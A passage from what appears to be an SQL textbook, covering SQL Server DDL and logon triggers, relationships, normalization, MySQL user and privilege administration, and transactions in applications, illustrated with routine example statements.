You can create DDL triggers at either the instance level (server scoped) or the database level (e.g. responding to tables being changed or dropped). You can also create server-level DDL triggers that respond to database-level events, so that they respond to those events in all databases. DDL triggers provide a mechanism for auditing or limiting the DBA, which is useful when you have a team that needs certain (e.g. elevated) permissions to databases; you can use DDL triggers to carry out the oversight a DBA would, which is very useful if you have a junior DBA on your team. When a trigger is executing, you have access to a function called EVENTDATA(). It returns a well-formed XML document that includes data about the user who executed the original statement, so you can check it to ensure everything is proper.
DDL triggers can respond to CREATE, ALTER, DROP, GRANT, DENY, REVOKE and UPDATE STATISTICS.
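EVENTDATA() is typically read inside the trigger body. As a sketch of how it can be used for auditing (the audit table and trigger name here are hypothetical), a database-scoped trigger could log every table change:

```sql
-- Hypothetical auditing setup: logs DDL activity in the current database.
CREATE TABLE dbo.DDLAudit (
    EventTime DATETIME DEFAULT GETDATE(),
    LoginName SYSNAME,
    EventXml  XML
);
GO

CREATE TRIGGER AuditDDL
ON DATABASE
FOR CREATE_TABLE, ALTER_TABLE, DROP_TABLE
AS
BEGIN
    -- EVENTDATA() returns the XML describing the statement that fired us.
    INSERT INTO dbo.DDLAudit (LoginName, EventXml)
    VALUES (ORIGINAL_LOGIN(), EVENTDATA());
END;
```

Because the full XML is stored, you can later query it for the statement text, the object affected and the time of the change.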

To create a DDL trigger you use the CREATE TRIGGER DDL statement. The structure of CREATE TRIGGER is the following:

CREATE TRIGGER trigger_name
ON { ALL SERVER | DATABASE }
WITH trigger_options
FOR | AFTER event_type
AS trigger_body

ON – specifies the scope of the DDL trigger: ALL SERVER (instance level) or DATABASE (database level).

WITH – either ENCRYPTION (to hide the definition of the trigger) or EXECUTE AS. EXECUTE AS takes one of LOGIN, USER, SELF, OWNER or CALLER. It allows you to change the security context of the trigger, i.e. the permission level under which it runs.

FOR or AFTER – either the FOR or the AFTER keyword; both are interchangeable in this context. The trigger will execute after the original statement completes.

AS – introduces either the SQL statements that define the body of the trigger or an EXTERNAL NAME clause pointing to a CLR trigger.

The following is an example of a DDL trigger which stops any user dropping or altering any table on the server scope:

CREATE TRIGGER DDLTriggerExample
ON ALL SERVER
FOR DROP_TABLE, ALTER_TABLE
AS
PRINT 'If you want to alter/delete this table you will need to disable this trigger'
ROLLBACK;

You can disable triggers using the DISABLE TRIGGER command and enable triggers with the ENABLE TRIGGER command. The following command disables all triggers on the server scope:

DISABLE TRIGGER ALL ON ALL SERVER

Logon Triggers

Logon triggers are like DDL triggers except that instead of firing in response to a DDL event they fire when a LOGON event occurs on the instance. Logon triggers have an advantage over other ways of handling logon events in SQL Server in that they can stop the user from establishing a connection. This is because they fire as part of the event rather than waiting for it to complete. This type of trigger is very useful when you want to limit the number of users connecting to the instance. Say, for example, the server is very busy in the evening running jobs; the following example illustrates how you can limit access to the instance from 6pm to midnight, except for the sysacc account:

CREATE TRIGGER StopNightLogin
ON ALL SERVER
FOR LOGON
AS
BEGIN
    IF (CAST(GETDATE() AS TIME) >= CAST('18:00:00' AS TIME)
        AND ORIGINAL_LOGIN() <> 'sysacc')
        ROLLBACK;
END;

Notes on Functions

A function cannot alter any external resource, like a table for example. A function needs to be robust, and if an error is generated inside it, either from invalid data being passed in or from its own logic, it will stop executing and control will return to the T-SQL that called it.
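To illustrate, here is a minimal scalar function (the name and logic are hypothetical); it computes a value from its inputs and modifies nothing outside itself:

```sql
-- Hypothetical scalar function: computes a line total.
-- A function body may read data but cannot INSERT, UPDATE or DELETE.
CREATE FUNCTION dbo.fn_LineTotal (@Quantity INT, @UnitPrice MONEY)
RETURNS MONEY
AS
BEGIN
    RETURN @Quantity * @UnitPrice;
END;
GO

-- Called from T-SQL; control returns to the caller when the function finishes.
SELECT dbo.fn_LineTotal(3, 9.99) AS LineTotal;
```

If invalid data were passed in (for example a NULL that the logic cannot handle), execution would stop and control would return to the calling T-SQL, as described above.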

Chapter 14 Relationships

A database relationship is a means of connecting two tables based on a logical link (i.e. they contain related data). Relationships allow database queries to be executed across two or more tables, and they also help ensure data integrity.

Types of relationships

There are three major types of relationship in a database:

One-to-One
One-to-Many
Many-to-Many

One-to-One

This type of relationship is pretty rare in databases. A row in a given table X will have at most one matching row in another table Y, and equally a row in table Y can only have one matching row in table X. An example of a one-to-one relationship is one person having one passport.

One-to-Many

This is probably the most prevalent relationship found in databases. A row in a given table X will have several matching rows in another table Y; however, a row in table Y will match only a single row in table X. An example is houses in a street: one street has multiple houses, and a house belongs to one street.

Many-to-Many

A row in a given table X will have several matching rows in another table Y, and vice versa. This type of relationship is quite frequent where there are zero, one or even many records in the master table related to zero, one or many records in the child table. An example of this relationship is a school, where teachers teach students. A teacher can teach many students, and each student can be taught by many teachers.

Referential Integrity

When two tables are connected in a database and share information, it is necessary that the data in both tables is kept consistent, i.e. either the information in both tables changes or neither table changes. This is known as

referential integrity. It is not possible to enforce referential integrity between tables that are in separate databases. When referential integrity is enforced, it isn’t possible to enter a record in the child (address) table that doesn’t have a matching record in the linked parent (customer) table (i.e. the one with the primary key). You need to first create the customer record and then use its details to create the address record. Besides relationships, you can also use triggers and stored procedures to enforce referential integrity.
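A sketch of how a one-to-many customer/address link with enforced referential integrity might be declared (the table and column names here are hypothetical):

```sql
-- Parent table: the one with the primary key.
CREATE TABLE Customer (
    CustomerID INT PRIMARY KEY,
    Name       VARCHAR(100) NOT NULL
);

-- Child table: every address must point at an existing customer.
CREATE TABLE Address (
    AddressID  INT PRIMARY KEY,
    CustomerID INT NOT NULL,
    Street     VARCHAR(200),
    FOREIGN KEY (CustomerID) REFERENCES Customer (CustomerID)
);

-- The customer record must exist first, so this order succeeds:
INSERT INTO Customer VALUES (1, 'Kathy Ale');
INSERT INTO Address  VALUES (10, 1, '12 High Street');

-- Inserting an address for CustomerID 99 (no such customer)
-- would violate referential integrity and be rejected.
```

The FOREIGN KEY constraint is what makes the database itself refuse inconsistent data, rather than relying on application code to check.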

Chapter 15 Database Normalization

In this chapter you will gain an in-depth knowledge of normalization techniques and their importance in database conceptualization and design. Normalization creates more efficient databases, which gives the SQL software application an edge in performing effective queries and maintaining data integrity at all times.

Definition and Importance of Database Normalization

Basically, normalization is the process of designing a database model to reduce data redundancy by breaking large tables into smaller but more manageable ones, where the same types of data are grouped together.

What is the importance of database normalization? Normalizing a database ensures that the pieces of information stored are well organized, easily managed and always accurate, with no unnecessary duplication. Merging the data from the CUSTOMER_TBL table with the ORDER_TBL table results in a large table that is not normalized:

If you look closely at this table, there is data redundancy concerning the customer named Kathy Ale. Always remember to minimize data redundancy, both to save disk or storage space and to prevent users from getting confused by the amount of information the table contains. There is also the possibility that, of several tables containing such customer information, one table may not match another. So how would a user verify which one is correct? Also, if a certain piece of customer information needs to be updated, then you are required to update the data in every database table where it is included. This entails a waste of time and effort in managing the entire database system.

Forms of Normalization

Normal form is a way of measuring the level to which a database has been normalized, and there are three common normal forms:

First Normal Form (1NF)

The first normal form or 1NF aims to divide a given set of data into logical units, or tables, of related information. Each table is assigned a primary key, a specified column that uniquely identifies the table rows. Every cell should hold a single value, and each row of a table refers to a unique record of information. The columns, which refer to the attributes of the table, are given unique names and consist of the same type of data values. Moreover, the columns and the rows are arranged in no particular order. Let us add a new table named Employee_TBL to the database that contains basic information about the company’s employees:

Based on the diagram above, the entire company database was divided into two tables – Employee_TBL and Customer_TBL. EmployeeID and CustomerID are the primary keys set for these tables respectively. By doing this, database information is easier to read and manage compared with having one big table consisting of many columns and rows. The data values stored in the Employee_TBL table refer only to the pieces of information describing the company’s employees, while those that pertain exclusively to the company’s customers are contained in the Customer_TBL table.

Second Normal Form (2NF)

The second normal form or 2NF is the next step after you have successfully achieved first normal form. This process focuses on the functional dependencies in the database, which describe the relationships existing between attributes. When one attribute determines the value of another, a functional dependency exists between them. Thus, you will store the data values from the Employee_TBL and Customer_TBL tables which are only partly dependent on the assigned primary keys in separate tables.

In the figure above, the attributes that are only partly dependent on the EmployeeID primary key have been removed from Employee_TBL and are now stored in a new table called Employee_Salary_TBL. The attributes that were kept in the original table are completely dependent on the table’s primary key, which means that for every record of last name, first name, address and contact number there is a corresponding unique employee ID. In the Employee_Salary_TBL table, by contrast, a particular employee ID does not point to a unique employee position or salary rate. It is possible that more than one employee holds the same position (EmpPosition) and receives the same pay rate (Payrate) or bonus (Bonus).

Third Normal Form (3NF)

In the third normal form or 3NF, pieces of information that are not dependent on the primary key at all should still be separated from the database table. Looking back at Customer_TBL, two attributes are totally independent of the CustomerID primary key – JobPosition (job position) and JobDescription (job position description). Regardless of who the customer is, any job position will have the same duties and responsibilities. Thus, the two attributes are separated into another table called Position_TBL.
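The splits described above can be sketched in DDL. The column types here are assumptions, since the diagrams only name the columns:

```sql
-- 1NF/2NF: attributes fully dependent on EmployeeID stay together...
CREATE TABLE Employee_TBL (
    EmployeeID INT PRIMARY KEY,
    LastName   VARCHAR(50),
    FirstName  VARCHAR(50),
    Address    VARCHAR(200),
    ContactNo  VARCHAR(20)
);

-- ...while position and pay details move to their own table.
CREATE TABLE Employee_Salary_TBL (
    EmployeeID  INT PRIMARY KEY REFERENCES Employee_TBL (EmployeeID),
    EmpPosition VARCHAR(50),
    Payrate     DECIMAL(10, 2),
    Bonus       DECIMAL(10, 2)
);

-- 3NF: job-position data independent of CustomerID gets its own table,
-- referenced from Customer_TBL instead of being repeated per customer.
CREATE TABLE Position_TBL (
    PositionID     INT PRIMARY KEY,
    JobPosition    VARCHAR(50),
    JobDescription VARCHAR(200)
);
```

Each fact now lives in exactly one place, so updating a position description, for example, touches a single row in Position_TBL.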

Drawbacks of Normalization

Though database normalization presents a number of advantages in organizing, simplifying and maintaining the integrity of databases, you still need to consider the following disadvantages:

Spreading data over more tables increases the need to join tables, which makes queries more tedious to write and the database harder to conceptualize.

Instead of real, meaningful data in one place, database tables hold fragments that must be reassembled by code.

Query processes become more difficult as the database model grows more complex.

Database performance is reduced, or becomes slower, as the normal form progresses; a normalized database requires much more CPU and memory usage.

To execute the normalization process efficiently, the user needs the appropriate knowledge and skills in optimizing databases. Otherwise, the design will be filled with inconsistencies.

Chapter 16 Database Security and Administration

MySQL has an integrated, advanced access control and privilege system that enables the creation of extensive access rules for user activities and efficiently prevents unauthorized users from accessing the database system. MySQL access control has two phases when a user connects to the server:

Connection verification: every user connecting to the server is required to have a valid username and password. Moreover, the host the user connects from must match the host recorded in the MySQL grant tables.

Request verification: after a connection has been established, for every query the user executes MySQL verifies whether the user has the privileges required to run that specific query. MySQL is capable of checking user privileges at database, table and column level.

The MySQL installer automatically generates a database called mysql. The mysql database comprises five main grant tables, which can be manipulated indirectly using statements such as GRANT and REVOKE:

user: contains columns for user accounts and global privileges. MySQL accepts or rejects a connection from a host using this table, and a privilege granted in the user table applies to all the databases on the server.

db: contains database-level privileges. MySQL uses the db table to decide which database a user can access and from which host the connection may be made. These privileges apply to the particular database and all the objects in that database, such as stored procedures, views, triggers, tables and many more.

tables_priv and columns_priv: contain privileges at the table and column level. A privilege granted in the tables_priv table applies to that particular table and its columns, while a privilege granted in the columns_priv table applies only to that particular column.

procs_priv: contains privileges for stored functions and procedures.

MySQL uses the tables listed above to regulate database server privileges. It is extremely essential to understand these tables before implementing your own dynamic access control system.

Creating User Accounts

In MySQL you indicate both the user that is permitted to connect to the database server and the host the user may connect from. As a result, each user account in MySQL consists of a username and a host name separated by the @ character. For instance, if the admin_user connects to the server from localhost, the user account is named admin_user@localhost. The admin_user may thus be allowed to connect to the server only from localhost, or from a specified remote host, which gives the server higher security. Moreover, by combining the username and host, several accounts with the same name can be configured, each able to connect from a distinct host and each given distinct privileges as needed. In the mysql database, all user accounts are stored in the user grant table.

Using the MySQL CREATE USER Statement

The CREATE USER statement is used to set up new user accounts on the MySQL server, as shown in the syntax below:

CREATE USER user_account IDENTIFIED BY password;

In the syntax above, the CREATE USER clause is followed by the name of the user account in username@hostname format. In the IDENTIFIED BY clause the user password is indicated. The password is specified in plain text, and MySQL encrypts it before the account is saved in the user table. For instance, the statement below creates a new user dbadmn, allowed to connect to the server from localhost, with the password Safe:

CREATE USER dbadmn@localhost IDENTIFIED BY 'Safe';

If you would like to check the permissions given to any user account, you can run the syntax below:

SHOW GRANTS FOR dbadmn@localhost;
SHOW GRANTS FOR dbadmn2@localhost2;

+-----------------------------------------------+
| GRANT USAGE ON *.* TO 'dbadmn'@'localhost'    |
+-----------------------------------------------+
| GRANT USAGE ON *.* TO 'dbadmn2'@'localhost2'  |
+-----------------------------------------------+
2 rows in set (0.20 sec)

The *.* in the output above indicates that the dbadmn and dbadmn2 users are allowed only to log into the server and have no other access privileges. Bear in mind that the portion before the dot (.) represents the database and the portion after the dot represents the table, as in db.tab.

The percentage (%) wildcard can be used as shown in the syntax below to allow a user to connect from any host:

CREATE USER 'dbadmn'@'%' IDENTIFIED BY 'safe';

The percentage (%) wildcard behaves the same way as it does in the LIKE operator. For example, to enable the msqladmn user account to connect to the server from any subdomain of the mysqhost.something host, you can use the syntax below:

CREATE USER 'msqladmn'@'%.mysqhost.something' IDENTIFIED BY 'safe';

It should also be noted that the underscore (_) wildcard can likewise be used in the CREATE USER statement.

If the host name portion of a user account is omitted, the server will allow that user to connect from any host. For instance, the syntax below generates a new remoteuser account that is allowed to connect from any host:

CREATE USER remoteuser;

To view the privileges given to the remoteuser account, you can use the syntax below:

SHOW GRANTS FOR remoteuser;

+-----------------------------------------+
| Grants for remoteuser@%                 |
+-----------------------------------------+
| GRANT USAGE ON *.* TO 'remoteuser'@'%'  |
+-----------------------------------------+
1 row in set (0.30 sec)

It is necessary to remember that the single quotation marks ('') in account names are particularly significant if the user account contains special characters such as underscore or percentage. If you inadvertently quote the whole account as one string, for example 'dbadmn@localhost', the server will create a new user whose name is dbadmn@localhost and enable it to connect from any host, which is probably not what you anticipated. The syntax below, for instance, generates such a user:

CREATE USER 'dbadmn@localhost';

SHOW GRANTS FOR 'dbadmn@localhost';

+-----------------------------------------------+
| Grants for dbadmn@localhost@%                 |
+-----------------------------------------------+
| GRANT USAGE ON *.* TO 'dbadmn@localhost'@'%'  |
+-----------------------------------------------+
1 row in set (0.01 sec)

If you try to create a user that already exists in the database, an error will be issued by MySQL. For instance, run the syntax below a second time for the remoteuser account:

CREATE USER remoteuser;

The error message below will be displayed on your screen:

ERROR 1396 (HY000): Operation CREATE USER failed for 'remoteuser'@'%'

Note that the CREATE USER statement only creates the new user; it does not grant any privileges. The GRANT statement is used to give access privileges to users.

Updating User Passwords

Prior to altering a MySQL user account password, the concerns listed below should be taken into consideration:

Which user account's password you would like to modify.

Which applications are using that user account. If the password is changed without altering the connection string of the applications using that account, those applications will no longer be able to connect to the database server.

MySQL offers a variety of statements that can be used to alter a user's password, such as the UPDATE, SET PASSWORD and ALTER USER statements. Let’s explore some of these!

Using the UPDATE Statement

The UPDATE statement can be used to update the user table in the mysql database directly. When you change a password this way, you must also execute the FLUSH PRIVILEGES statement to reload the privileges from the grant tables.

Assume that you would like to change the password for the dbadmn user, which connects from localhost, to fish. This can be accomplished by executing the query below:

USE mysql;
UPDATE user
SET password = PASSWORD('fish')
WHERE user = 'dbadmn' AND host = 'localhost';
FLUSH PRIVILEGES;

Using the SET PASSWORD Statement

For updating a user password with SET PASSWORD, the user@host account format is used. If you want to modify the password of some other user's account, you are required to have the UPDATE privilege on the mysql database. With the SET PASSWORD statement, the FLUSH PRIVILEGES statement does not need to be executed in order to reload the privileges from the grant tables. The syntax below can be used to alter the dbadmn user account password:

SET PASSWORD FOR 'dbadmn'@'localhost' = PASSWORD('bigfish');

Using the ALTER USER Statement

Another method of updating a user password is the ALTER USER statement with the IDENTIFIED BY clause. For instance, the query below can be executed to change the password of the dbadmn user to littlefish:

ALTER USER dbadmn@localhost IDENTIFIED BY 'littlefish';

***USEFUL TIP***
If you need to change the password of the root account, the server must be stopped and started back up with grant-table validation skipped.

Granting User Privileges

As a new user account is created, no access privileges are granted to it by default. The GRANT statement must be used to grant privileges to a user account. The syntax of the statement is shown below:

GRANT privilege [, privilege] ...
ON privilege_level
TO user [IDENTIFIED BY password]
[REQUIRE tls_option]
[WITH [GRANT OPTION | resource_option]];

In the syntax above, we start by specifying one or more privileges following the GRANT clause. If you would like to give the user account more than one privilege at the same time, each privilege must be separated by a comma. (The list of privileges that may be granted to a user account is given in the table below.)

After that you indicate the privilege_level, which determines the level at which the privileges apply. The privilege levels supported by MySQL are global (*.*), database (database.*), table (database.table) and column level.

Next you indicate the user to be granted the privileges. If the indicated user exists on the server, the GRANT statement modifies its privileges; otherwise, a new user account is created. The IDENTIFIED BY clause is optional and allows you to set a new password for the user. Thereafter, you can indicate whether the user must connect to the database via secure connections. Finally, the optional WITH GRANT OPTION clause allows the user to grant to, or revoke from, other users the privileges given to its own account. The WITH clause can also be used to assign resource limits on the MySQL database server, for example putting a limit on the number of connections or statements that can be

used by the user per hour. In shared environments, such as MySQL shared hosting, the WITH clause is extremely useful.

Note that to use the GRANT statement your own account must already hold the GRANT OPTION privilege as well as the privileges you intend to grant to other users. If the read_only system variable is enabled, executing the GRANT statement additionally requires the SUPER privilege.

The privileges that can be granted, and the levels (Global, Database, Table, Column) at which each applies, are listed below:

ALL – Grants all of the privileges at the specified access level, except GRANT OPTION. (Global, Database, Table)
ALTER – Allows use of the ALTER TABLE statement. (Global, Database, Table)
ALTER ROUTINE – Allows altering and dropping stored routines. (Global, Database)
CREATE – Allows creating databases and tables. (Global, Database, Table)
CREATE ROUTINE – Allows creating stored routines. (Global, Database)
CREATE TABLESPACE – Allows creating, altering or dropping tablespaces and log file groups. (Global)
CREATE TEMPORARY TABLES – Allows creating temporary tables with CREATE TEMPORARY TABLE. (Global, Database)
CREATE USER – Allows use of the CREATE USER, DROP USER, RENAME USER and REVOKE ALL PRIVILEGES statements. (Global)
CREATE VIEW – Allows creating or updating views. (Global, Database, Table)
DELETE – Allows use of the DELETE statement. (Global, Database, Table)
DROP – Allows dropping databases, tables and views. (Global, Database, Table)
EVENT – Allows use of events in the Event Scheduler. (Global, Database)
EXECUTE – Allows executing stored routines. (Global, Database)
FILE – Allows reading files in the database directories. (Global)
GRANT OPTION – Allows granting to, or revoking from, other users the privileges held by your own account. (All levels)
INDEX – Allows creating or dropping indexes. (Global, Database, Table)
INSERT – Allows use of the INSERT statement. (Global, Database, Table, Column)
LOCK TABLES – Allows use of LOCK TABLES on tables for which you have the SELECT privilege. (Global, Database)
PROCESS – Allows viewing all processes with the SHOW PROCESSLIST statement. (Global)
PROXY – Enables one user to act as a proxy for another. (User to user)
REFERENCES – Allows creating foreign keys. (Global, Database, Table, Column)
RELOAD – Allows use of the FLUSH operation. (Global)
REPLICATION CLIENT – Allows the user to ask where the master or slave servers are. (Global)
REPLICATION SLAVE – Allows replication slaves to read binary log events from the master. (Global)
SELECT – Allows use of the SELECT statement. (Global, Database, Table, Column)
SHOW DATABASES – Allows the user to view all databases. (Global)
SHOW VIEW – Allows use of the SHOW CREATE VIEW statement. (Global, Database, Table)
SHUTDOWN – Allows use of the mysqladmin shutdown command. (Global)
SUPER – Allows other administrative operations such as CHANGE MASTER TO, KILL, PURGE BINARY LOGS, SET GLOBAL and mysqladmin commands. (Global)
TRIGGER – Allows use of TRIGGER operations. (Global, Database, Table)
UPDATE – Allows use of the UPDATE statement. (Global, Database, Table, Column)
USAGE – Equivalent to no privilege.

EXAMPLE

More often than not, the CREATE USER statement is used first to create a new user account, and the GRANT statement is then used to assign privileges to the user. For instance, a new super user account can be created by executing the CREATE USER statement given below:

CREATE USER super@localhost IDENTIFIED BY 'dolphin';

In order to check the privileges granted to the super@localhost user, the query below with the SHOW GRANTS statement can be used:

SHOW GRANTS FOR super@localhost;
+-------------------------------------------+
| Grants for super@localhost                |
+-------------------------------------------+
| GRANT USAGE ON *.* TO `super`@`localhost` |
+-------------------------------------------+
1 row in set (0.00 sec)

Now, if you wanted to assign all privileges to the super@localhost user, the

query below with the GRANT ALL statement can be used:

GRANT ALL ON *.* TO 'super'@'localhost' WITH GRANT OPTION;

The ON *.* clause refers to all databases and all objects within those databases. The WITH GRANT OPTION clause enables super@localhost to assign privileges to other user accounts. If the SHOW GRANTS statement is used again at this point, it can be seen that the privileges of the super@localhost user have been modified, as shown in the result set below:

SHOW GRANTS FOR super@localhost;
+----------------------------------------------------------------------+
| Grants for super@localhost                                           |
+----------------------------------------------------------------------+
| GRANT ALL PRIVILEGES ON *.* TO `super`@`localhost` WITH GRANT OPTION |
+----------------------------------------------------------------------+
1 row in set (0.00 sec)

Now, assume that you want to create a new user account (here called dbadmin) with all privileges on the classicmodels sample database. You can accomplish this by using the query below:

CREATE USER dbadmin@localhost IDENTIFIED BY 'whale';
GRANT ALL ON classicmodels.* TO dbadmin@localhost;

Using only one GRANT statement, various privileges can be granted to a user account. For instance, to create a user account with the privilege of executing SELECT, UPDATE and DELETE statements against the classicmodels database, the query below can be used:

CREATE USER rfc IDENTIFIED BY 'shark';
GRANT SELECT, UPDATE, DELETE ON classicmodels.* TO rfc;

Revoking User Privileges

You will use the MySQL REVOKE statement to revoke privileges from a user account. MySQL enables the withdrawal of one or more privileges, or even all previously granted privileges, of a user account. The syntax below can be used to revoke particular privileges from a user account:

REVOKE privilege_type [(column_list)]
    [, privilege_type [(column_list)]] ...
ON [object_type] privilege_level
FROM user [, user] ...

In the syntax above, we start by specifying, after the REVOKE keyword, a list of the privileges to be revoked from the user account. You might recall that when listing multiple privileges in a statement they must be separated by commas. Then, in the ON clause, we indicate the privilege level at which these privileges are revoked. Lastly, in the FROM clause, we indicate the user account whose privileges are being revoked. Bear in mind that your own user account must have the GRANT OPTION privilege as well as the privileges you want to revoke from other user accounts.

You will use the REVOKE statement as shown in the syntax below if you are looking to withdraw all privileges of a user account:

REVOKE ALL PRIVILEGES, GRANT OPTION FROM user [, user] ...

It is important to remember that to execute the REVOKE ALL statement you are required to have either the CREATE USER privilege at the global level or the UPDATE privilege on the mysql database.

You will use the REVOKE PROXY clause, as shown in the query below, in order to revoke proxy users:

REVOKE PROXY ON user FROM user [, user] ...

A proxy user is a valid user in a MySQL environment who has the capability of impersonating another user. As a result, the proxy user attains all the privileges granted to the user it is impersonating.

Best practice dictates that you should first check what privileges have been assigned to the user, by executing the SHOW GRANTS statement as below, prior to withdrawing the user's privileges:

SHOW GRANTS FOR user;

EXAMPLE

Assume that there is a user named rfd with SELECT, UPDATE and DELETE privileges on the classicmodels sample database, and you would like to revoke the UPDATE and DELETE privileges from the rfd user. To accomplish this, you can execute the queries below. To start with, we check the user's privileges using the SHOW GRANTS statement:

SHOW GRANTS FOR rfd;
GRANT SELECT, UPDATE, DELETE ON `classicmodels`.* TO 'rfd'@'%'

At this point, the UPDATE and DELETE privileges can be revoked from the rfd user using the query below:

REVOKE UPDATE, DELETE ON classicmodels.* FROM rfd;

Next, the privileges of the rfd user can be checked with the SHOW GRANTS statement:

SHOW GRANTS FOR rfd;
GRANT SELECT ON `classicmodels`.* TO 'rfd'@'%'

Now, if you wanted to revoke all the remaining privileges from the rfd user, you can use the query below:

REVOKE ALL PRIVILEGES, GRANT OPTION FROM rfd;

To verify that all the privileges of the rfd user have been revoked, use the query below:

SHOW GRANTS FOR rfd;
GRANT USAGE ON *.* TO 'rfd'@'%'

Remember, the USAGE privilege simply means that the user has no privileges on the server.

Resulting Impact of the REVOKE Query

The impact of the MySQL REVOKE statement relies primarily on the level of the privilege revoked, as explained below:

Modifications made to global privileges only take effect when the user connects to the MySQL server in a subsequent session, after the successful execution of the REVOKE query. The modifications are not applied to users already connected to the server while the REVOKE statement is being executed.

Modifications made to database privileges are applied after the next USE statement is executed following the REVOKE query.

Table and column privilege modifications are applied to all queries executed after the modifications have been made with the REVOKE statement.

Chapter 17 Real-World Uses

We have seen how we can use SQL in isolation. For instance, we went through different ways to create tables and what operations you can perform on those tables to retrieve the answers you need. This style of use is fine if you only wish to learn how SQL works, but it is not how SQL is used in practice. The syntax of SQL is close to English, but it is not an easy language to master. Most computer users are not familiar with SQL, and you can assume that there will always be individuals who do not understand how to work with it. When a question about a database comes up, a typical user will almost never write a SELECT statement to answer it. Application developers and systems analysts are probably the only people who are comfortable with SQL, and even they do not make a career out of typing queries into a database to retrieve information. They instead develop applications that write queries. If you intend to reuse the same operation, you should ensure that you never have to rebuild it from scratch; instead, write an application to do the job for you. When you use SQL inside an application, it works differently.

SQL IN AN APPLICATION

You may consider SQL an incomplete programming language, because to use it in an application you must combine it with a procedural language such as FORTRAN, Pascal, C, Visual Basic, C++, COBOL or Java. SQL has strengths and weaknesses that come from how the language is structured; a procedural language, being structured differently, has different strengths and weaknesses. When you combine the two, each can compensate for the weaknesses of the other, and you can build a powerful application with a wide range of capabilities.

We use an asterisk to indicate that we want to include all the columns in a table. If the table has many columns, the asterisk can save a lot of typing.
Do not use the asterisk, however, when you are writing a program in a procedural language. Once the application is written, someone may add a column to the table or delete one that is no longer necessary, and doing so changes the meaning of the asterisk. If the application uses the asterisk, it may retrieve different columns from the ones it thinks it is getting.

This change will not affect the existing program until you recompile it, perhaps to make some change or to fix a bug. At that point the asterisk wildcard expands to the table's current columns, and the application may stop working for a reason that is very hard to identify during debugging. Therefore, when you build an application, refer to the column names explicitly and avoid the asterisk.

Since replacing the paper files stored in physical filing cabinets, relational databases have broken new ground. Relational database management systems, or RDBMS for short, are used anywhere information is stored or retrieved, whether it is a login account for a website or the articles on a blog. Databases also provided the platform that allowed websites such as Wikipedia, Facebook, Amazon, and eBay to grow. Wikipedia, for instance, contains articles, links, and images, all of which are stored in a database behind the scenes. Facebook holds much the same kind of information, while Amazon stores product information and payment methods and even handles payment transactions.

Along the same lines, banks use databases for payment transactions and to manage the funds in their customers' accounts. Other industries, such as retail, use databases to store product information, inventory, sales transactions, prices, and much more. Medical offices use databases to store patient information, prescription medications, appointments, and other records.

To expand on the medical office example, a database allows numerous users to connect to it at once and interact with its information. Because connections are managed over a network, virtually anyone with access to the database can reach it from almost anywhere in the world. Databases of this kind have also created new jobs and expanded the tasks and responsibilities of existing ones.
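The danger of the asterisk can be demonstrated in miniature. The sketch below uses Python's built-in sqlite3 module as a stand-in for a production database driver; the table and column names are invented for illustration. A query that names its columns survives a schema change, while SELECT * silently changes shape.

```python
import sqlite3

con = sqlite3.connect(":memory:")
con.execute("CREATE TABLE customers (id INTEGER, name TEXT, email TEXT)")
con.execute("INSERT INTO customers VALUES (1, 'Ada', 'ada@example.com')")

# Fragile: the shape of each row changes if columns are added or dropped.
star_row = con.execute("SELECT * FROM customers").fetchone()

# Robust: the application gets exactly the columns it asked for, in order.
explicit_row = con.execute("SELECT id, name FROM customers").fetchone()

# Simulate a later schema change: a migration adds a column.
con.execute("ALTER TABLE customers ADD COLUMN phone TEXT")

star_after = con.execute("SELECT * FROM customers").fetchone()       # now 4 values
explicit_after = con.execute("SELECT id, name FROM customers").fetchone()  # unchanged
```

Any code that unpacked the first query's rows into three variables would break after the migration, while the explicit query keeps returning the same two columns.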
Those who work in finance, for instance, can now run reports on financial data; those in sales can run reports for sales forecasts; and so on.

In practical situations, databases are often used by many people at the same time. A database that can support many simultaneous users has a high level of concurrency. In some situations, concurrency can lead to lost data or to reads of data that no longer exists. SQL manages these situations by using transactions to control atomicity, consistency, isolation, and durability. Together, these four elements make up the properties of transactions.

A transaction is a sequence of T-SQL statements that combine logically to complete an operation which, performed piecemeal, would introduce inconsistency into the database. Atomicity is the property that acts as a container for the transaction's statements: if every statement succeeds, the whole transaction completes, but if any part of the transaction cannot be processed fully, the entire operation fails and all partial changes roll back to the prior state.

Transactions take place once a row-level or page-level lock is in place. Locking prevents other users' modifications from taking effect on the locked object; it is akin to reserving a spot within the database in which to make changes. If another user attempts to change data under lock, their process fails, and an alert communicates that the object in question is barred and unavailable for modification.

Transforming data inside transactions moves the database from one consistent state to a new consistent state. It is critical to understand that a transaction can modify more than one table, or even more than one database, at a time. Changing data in a primary key field without simultaneously updating the matching foreign key field, or vice versa, creates inconsistent data that SQL does not accept. Transactions are therefore a big part of changing related data across multiple tables all at once.

Transactional transformation also reinforces isolation, the property that prevents concurrent transactions from interfering with each other. If two transactions touch the same data at the same time, only one of them will succeed. Transactions are invisible to other users until they are complete, and whichever transaction completes first is accepted. The new information is displayed once the other transaction fails, and at that point the user must decide whether the updated data still requires modification.
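Atomicity is easiest to see in a classic funds transfer. The sketch below is a minimal illustration using Python's sqlite3 module; the accounts table, its CHECK constraint, and the transfer function are all invented for the example. Both UPDATE statements succeed together or neither takes effect.

```python
import sqlite3

# isolation_level=None lets us issue BEGIN/COMMIT/ROLLBACK by hand.
con = sqlite3.connect(":memory:", isolation_level=None)
con.execute(
    "CREATE TABLE accounts ("
    "  name TEXT PRIMARY KEY,"
    "  balance INTEGER NOT NULL CHECK (balance >= 0))"
)
con.executemany("INSERT INTO accounts VALUES (?, ?)",
                [("alice", 100), ("bob", 50)])

def transfer(con, src, dst, amount):
    """Move funds inside one transaction: all-or-nothing."""
    try:
        con.execute("BEGIN")
        con.execute("UPDATE accounts SET balance = balance - ? WHERE name = ?",
                    (amount, src))
        con.execute("UPDATE accounts SET balance = balance + ? WHERE name = ?",
                    (amount, dst))
        con.execute("COMMIT")
        return True
    except sqlite3.Error:
        con.execute("ROLLBACK")   # undo any partial changes
        return False

ok = transfer(con, "alice", "bob", 30)    # succeeds: balances become 70 / 80
bad = transfer(con, "alice", "bob", 500)  # CHECK fails, whole transfer rolls back
balances = dict(con.execute("SELECT name, balance FROM accounts"))
```

After the failed transfer, neither account has changed: the rollback restored the prior consistent state, exactly as the atomicity property requires.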
If a power outage strikes and the stability of the system fails, durability ensures that the effects of incomplete transactions are rolled back. If one transaction has completed and a concurrent transaction has failed to finish, the completed transaction is retained and the unfinished one is undone. The database engine accomplishes rollbacks by using the transaction log to identify the previous state of the data and restore it to that earlier point in time.

